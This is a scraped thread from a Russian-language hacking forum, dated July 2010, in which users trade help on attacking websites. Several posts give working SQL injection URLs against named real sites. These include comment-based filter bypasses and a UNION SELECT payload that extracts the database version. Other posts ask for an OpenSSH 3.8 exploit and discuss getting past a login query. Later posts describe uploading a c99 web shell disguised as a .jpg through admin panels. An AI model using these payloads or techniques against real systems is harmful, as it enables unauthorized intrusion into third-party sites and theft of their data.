 |
|
18.07.2010, 21:18
|
|
Новичок
Регистрация: 11.07.2010
Сообщений: 0
С нами:
8335766
Репутация:
0
|
|
Exploit for OpenSSH 3.8
Ребят, под эту версию есть какие нибудь эксплоиты? весь гугл перерыл - ничего дельного не нашел =(
|
|
|
18.07.2010, 21:52
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Сообщение от auth_root
Прочитал статейку про обход фильтрации, но ни один приведённый способ не помог.Не смог применить на практике, но часто встречаюсь. Поэтому материал не усвоил =)
Хотелось бы на живом примере. Вот нашел сайт, вроде подходящий.
http://aktualnews.com/sport/?id=764'
select%20 или (+) c пробелом фильтруется (Forbidden), с /**/ запрос проходит.
Версия 5.0.90-community
http://aktualnews.com/sport/?id=-764/**/union/**/select/**/1,2,version(),4,5--+
Имена таблиц из information_schema.tables получить не могу, т.к. from фильтруется тоже. Вот как его обойти и хотелось бы увидеть на примере.
возможно просто нет доступа к information_schema.tables, но я с таким ещё не встречался.Поэтому мне кажется дело в фильтрации,но я могу и ошибаться.
_http://aktualnews.com/sport/?id=-764/**/union/**/select/**/1,2,3,4,5/**/FrOm/**/information_schema.`tables`--+
|
|
|
|
19.07.2010, 01:00
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Как можно попасть в админку, если есть запрос при авторизации
SELECT pass FROM user WHERE username = '[SQL]'
Этиим запросом достается пароль и сверяется с тем паролем, что я ввел, поэтому "or 1=1--" и прочее не подходит.
|
|
|
|
19.07.2010, 01:36
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
С нами:
9709737
Репутация:
88
|
|
Не удается подобрать поля
Сообщение от None
http://www.arbeitsmarktportal.eu/stellengesuche4.php?Bundesland=Baden-W%FCrttemberg&AktuelleSeite=%2527
Помогите плиз справится |
|
|
|
19.07.2010, 01:50
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от AKYLA
Не удается подобрать поля
Помогите плиз справится
http://www.arbeitsmarktportal.eu/stellengesuche-anzeigen.php?recordID=1816+UNION+SELECT+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,unhex(hex(v ersion()),38,39,40,41,42,43,44,45+LIMIT+1,1--
Database Version: 4.1.13
|
|
|
|
19.07.2010, 05:56
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от AKYLA
Не удается подобрать поля
Помогите плиз справится
если не получается в одном скрипте реализовать sql, то ищи другие скрипты и пробуй реализовать там, как впринцепи и зделал Gorev
|
|
|
|
19.07.2010, 08:06
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от попугай
Как можно попасть в админку, если есть запрос при авторизации
SELECT pass FROM user WHERE username = '
[SQL]
'
Этиим запросом достается пароль и сверяется с тем паролем, что я ввел, поэтому "or 1=1--" и прочее не подходит.
а поконкретней код как устроен?
|
|
|
|
19.07.2010, 14:54
|
|
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
С нами:
8750657
Репутация:
65
|
|
переименовал шелл c99.php на c99.php.jpg
попробовал уже на 2х админках, не заливается выдает ошибку что не тот формат можт че не так или админ сильно умный
|
|
|
|
19.07.2010, 15:01
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от KENT1994
переименовал шелл c99.php на c99.php.jpg
попробовал уже на 2х админках, не заливается выдает ошибку что не тот формат
можт че не так или админ сильно умный
конечно же все зависит от скрипта через который происходит заливка, не все же скрипты проверяют расширение...у некоторых есть и другие способы защиты от заливки нежелательных файлов
тыц мышкой
|
|
|
|
19.07.2010, 15:02
|
|
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
С нами:
8750657
Репутация:
65
|
|
еще вопрос , залил все таки шелл c99.php.jpg , но страница не отображается
пишет 403
http://www.site.org/docs/c99madshell.php.jpg
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?2256761){kind=avatar}
Похожие темы
Линейный вид
